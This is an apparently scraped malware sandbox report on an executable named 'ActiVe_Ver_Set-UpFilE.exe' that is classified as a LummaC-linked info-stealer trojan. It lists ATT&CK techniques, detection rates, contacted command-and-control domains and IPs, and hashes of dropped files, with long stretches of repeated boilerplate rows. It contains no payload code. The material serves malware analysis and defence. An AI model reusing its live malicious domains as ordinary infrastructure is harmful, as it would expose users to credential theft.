Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior |
Source: | Directory queried: |
Remote Access Functionality |
---|
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 23 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 12 Process Injection | 2 Obfuscated Files or Information | 11 Input Capture | 25 System Information Discovery | Remote Desktop Protocol | 31 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 221 Security Software Discovery | SMB/Windows Admin Shares | 11 Input Capture | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 11 Masquerading | NTDS | 3 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 15 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 221 Virtualization/Sandbox Evasion | LSA Secrets | 221 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
16% | Virustotal | Browse | ||
37% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
cegu.shop | 185.161.251.21 | true | false | high | |
unwrittenuzy.shop | 172.67.192.161 | true | true | unknown | |
klipgonuh.shop | 104.21.15.122 | true | false | high | |
MEulnHJCXFzW.MEulnHJCXFzW | unknown | unknown | false | unknown | |
dfgh.online | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false | high | ||
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.21.15.122 | klipgonuh.shop | United States | 13335 | CLOUDFLARENETUS | false | |
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false | |
172.67.192.161 | unwrittenuzy.shop | United States | 13335 | CLOUDFLARENETUS | true |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1591953 |
Start date and time: | 2025-01-15 15:52:16 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 0s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | ActiVe_Ver_Set-UpFilE.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@30/27@5/3 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 8152 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenFile calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryDirectoryFile calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description |
---|---|---|
09:53:11 | API Interceptor | |
09:53:15 | API Interceptor | |
09:53:57 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
104.21.15.122 | Get hash | malicious | LummaC Stealer | Browse | ||
185.161.251.21 | Get hash | malicious | LummaC | Browse | ||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC, CAPTCHA Scam ClickFix, LummaC Stealer | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
cegu.shop | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC, CAPTCHA Scam ClickFix, LummaC Stealer | Browse |
| ||
klipgonuh.shop | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Phisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
NTLGB | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Wannacry | Browse |
| ||
Get hash | malicious | Wannacry | Browse |
| ||
Get hash | malicious | Wannacry | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Phisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
a0e9f5d64349fb13191bc781f81f42e1 | Get hash | malicious | PureCrypter, LummaC, LummaC Stealer | Browse |
| |
Get hash | malicious | PureCrypter, LummaC, LummaC Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC, PureLog Stealer | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\user\AppData\Local\Temp\686105\Challenged.com | Get hash | malicious | Vidar | Browse | ||
Get hash | malicious | RHADAMANTHYS | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | Remcos | Browse | |||
Get hash | malicious | Remcos | Browse | |||
Get hash | malicious | Remcos | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC Stealer | Browse |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1510207563435464 |
Encrypted: | false |
SSDEEP: | 3:NlllulBkXj:NllUS |
MD5: | 453075887941F85A80949CDBA8D49A8B |
SHA1: | 7B31CA484A80AA32BCC06FC3511547BCB1413826 |
SHA-256: | 84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8 |
SHA-512: | 02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | modified |
Size (bytes): | 947288 |
Entropy (8bit): | 6.630612696399572 |
Encrypted: | false |
SSDEEP: | 24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK |
MD5: | 62D09F076E6E0240548C2F837536A46A |
SHA1: | 26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2 |
SHA-256: | 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49 |
SHA-512: | 32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 476554 |
Entropy (8bit): | 7.999628802334434 |
Encrypted: | true |
SSDEEP: | 12288:yyVkk91yI5LEu9as4r0c2kQ+SlSznDswmA7y1ifP:yyVJJTU5grXkD/O1ifP |
MD5: | 4EEA8EF05E53A0E932F541F782FE04F5 |
SHA1: | 18DEE77234A6196C0B88C38019D0260E60AEA089 |
SHA-256: | 18D0B04337185F18901CE6A3FCCAB9669871DD68C1BA18C4FC5D8EBD18F842A0 |
SHA-512: | 1AAC5E816A736A1DCB45FAE8A9B501C1CE042F133E6A6DA6AA04D6BB7DA7F5128CA6C979B6C6F72468E04757895466DD6B14A27636C8EA74A23B34AE83CC7E74 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\ActiVe_Ver_Set-UpFilE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 80896 |
Entropy (8bit): | 7.997822701030677 |
Encrypted: | true |
SSDEEP: | 1536:3QHujs/AEawKuaNL3ycENuFONI35GhwLGSh+BTX+yAFWcggYyqMBkA+W:uumyw/aNLCvsL35Ghkr+BnEBPhkAx |
MD5: | 889B4DF8E02C44F15D928979A1526A89 |
SHA1: | 20C4B9F1753080E78800BA06F769653D5D9B88E6 |
SHA-256: | 4522ABC9637F7ECD25589017B66746FF4BAF20C9E155C6CA898F143EAFE13151 |
SHA-512: | E36ABA468FD7B8E70BF887FF05A23CBA72E1151D14187B560395516A845DDE2481982C215C29A179F8AC8800D2B41AE5CCD20DA40793514FB76800F100ED5D54 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\ActiVe_Ver_Set-UpFilE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 490125 |
Entropy (8bit): | 7.998560081184218 |
Encrypted: | true |
SSDEEP: | 12288:lvqlpwkRkMB/MDu3Gmawl/WguCwnvMl/tvAs:QwxMB/MDuWmawl/yCwvMTB |
MD5: | A21648EECC1FFE4A3C22BBAA26BE3620 |
SHA1: | 80220F8CE3BC9045D4EF3A582D7600D0F6B29F72 |
SHA-256: | A2877DDC986C2F4A64C1E524FF2A254D7C9F7D7A385862E57D882ADFEF2BE75F |
SHA-512: | A06B78AED979DCADFAC9E9B460C7FAF33D3085943EE0D496947A1FAA7DED0A129E56A81320A4A0FD44DB5F19860DC79117C6365C6352341B92B316C42ED859C3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2932 |
Entropy (8bit): | 5.515085774493815 |
Encrypted: | false |
SSDEEP: | 48:v9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+MAyKnFHbgxl:1SEA5O5W+MfH5S1CqlVJcI6mlb2l |
MD5: | 11BEED5EC40A6661F00A9DCB0D172532 |
SHA1: | 9ADD533CF3F32A9995C237A0F785F63711D72D4B |
SHA-256: | 736138481EC159225CA4D2DB5FD9BDBC686F635DCCAC7A413FCFE6F13F3DAE22 |
SHA-512: | BFFDA16A687661C6C2A44960AA5F5D134B571B886ABBE80D81027F60EE2C51C22CDA3D3D1587F8DE7C8635AAC45470819D0D79DC3A576C7273B2219611190D85 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\ActiVe_Ver_Set-UpFilE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12181 |
Entropy (8bit): | 5.172671157341599 |
Encrypted: | false |
SSDEEP: | 192:PMTdHGx4/HopEV5Yxccb1doxGSrDIpi9WpLCZd2Vn/yP885SUKgnQtNq/g:PMB/HhV/wOvDIE9WpLCX2Vn/e88kUK4O |
MD5: | 981D8595DB467DDB19AB9CE140333D86 |
SHA1: | 26AB8D6FFA7797B1198BBBD3D92403EC357F73E2 |
SHA-256: | AD9C3F5967D09C5A1AB46EF960761F8DE0B72DD049A18883036E6689F8E17C64 |
SHA-512: | BADA40F6CEBFB715FB9E88B7FA57B9FA3B86CACB1EB2BA661EAEE3AF197AC5F1C925FBDA36E4C5803EECCADE9A6C92D993A1236BF5759C25E1399F848FB2A5EC |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12181 |
Entropy (8bit): | 5.172671157341599 |
Encrypted: | false |
SSDEEP: | 192:PMTdHGx4/HopEV5Yxccb1doxGSrDIpi9WpLCZd2Vn/yP885SUKgnQtNq/g:PMB/HhV/wOvDIE9WpLCX2Vn/e88kUK4O |
MD5: | 981D8595DB467DDB19AB9CE140333D86 |
SHA1: | 26AB8D6FFA7797B1198BBBD3D92403EC357F73E2 |
SHA-256: | AD9C3F5967D09C5A1AB46EF960761F8DE0B72DD049A18883036E6689F8E17C64 |
SHA-512: | BADA40F6CEBFB715FB9E88B7FA57B9FA3B86CACB1EB2BA661EAEE3AF197AC5F1C925FBDA36E4C5803EECCADE9A6C92D993A1236BF5759C25E1399F848FB2A5EC |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\ActiVe_Ver_Set-UpFilE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 51200 |
Entropy (8bit): | 7.996382964155462 |
Encrypted: | true |
SSDEEP: | 768:h9xL5XUmxKO6d0VGHemjLJI522PobNWddmtfEQbMwvH+UkTxm5ptIn4Uf:RZUysaG+mXJ52P0NWddmUwFUxm5FUf |
MD5: | E8E5EA080E74FC4A214CB16959FC90D9 |
SHA1: | ED30CFF176BEA84F2688C0E63C209A17ACE16FB2 |
SHA-256: | CA88DF3DEFB2382DCCE752205F72D5D04016701463A375C0ABD1EDCAE957DC4B |
SHA-512: | 9908C13BC90358FC1DC5611856137B4AF76ED95BE2D155D072F2F0BD3394474E78D225F05C849E0EDD00E7970E25A286DD5209C79EE1FB2A37618460BDD7BEB5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 6.66700002532537 |
Encrypted: | false |
SSDEEP: | 1536:uI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneA9:d4CE0Imbi80PtCZ9 |
MD5: | 4A8E3A487E281003724F042C068452EE |
SHA1: | 84F463CC6E983FD57B63EDAC6530B41BFB447DAB |
SHA-256: | CB88804B935C409E4ACD609145289010DFFFD14C41D61BE3ED0AFCB80584EEEA |
SHA-512: | 5C84882C87882CEA482AC060F3BC4F611FAAAA16DDB214E36187F89E177DC485773F872CCE229D0A78E3D0BAC1577681C99501EBC65542ACEB015231CA2468BB |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\ActiVe_Ver_Set-UpFilE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 96256 |
Entropy (8bit): | 7.99783969547034 |
Encrypted: | true |
SSDEEP: | 1536:MV/39bBXePLGNOQRrVxPRsHhX8R/r7RGjBcjgNkOBkTK3ZPG6TzH/7QkXwfDfQsk:M19b8dWrtsJENGjBhNjkTK3VtwfEV |
MD5: | FB08BFBBA7BBFAFFB1BEF33BEC0325B0 |
SHA1: | CB5C2BB594356DEC00DCD2B7EFA43FE2FC6B42EF |
SHA-256: | B9537B016B1D602532C1F4DC635AB8313ED26B18DC4F449CD6BF79541C32D64F |
SHA-512: | 31B8C85CD227921A1EF99A341C3ACE5B19463BA9B8302389FFCDE0A1F65D2902DD65BB1BD10967610C3E7BD622F209C9959D9E8C9D951ACDBBDA4D43469A1829 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 115712 |
Entropy (8bit): | 5.281608952247817 |
Encrypted: | false |
SSDEEP: | 1536:paj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2+9BGmL:Y6whxjgarB/5elDWy4ZNoGmL |
MD5: | D961B5EF55B28B1C8BD2E01AC2FC727B |
SHA1: | 13D92B9408EFD5D75B89BFCAF71C767493566E49 |
SHA-256: | BE316C27F60F8425BB8C3147F57F9A5F6ED0BD6CB4AE6DEB01E4C4139BCA5B9D |
SHA-512: | 6D9E317ACA5AD47C0578146A4F17F5BC17E3B9E03CD7A1D83F2A42ADAEECB0676132402615A2E458E380919C3F6173439C911FDA028E255490EF50B606E86DC1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 105472 |
Entropy (8bit): | 6.585859606379442 |
Encrypted: | false |
SSDEEP: | 3072:e7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLthq:66AUkB0CThp6vmVnjphq |
MD5: | 487E92F25B04BE93DC5BA74FB4A1B1B5 |
SHA1: | E33F756A9E9903CE42147F41C98A73E9D9808BB1 |
SHA-256: | 4064C9B3D6CA23DFA3C649ACF6063C6943564A7E1B0A229272BDBB3AB7D4C366 |
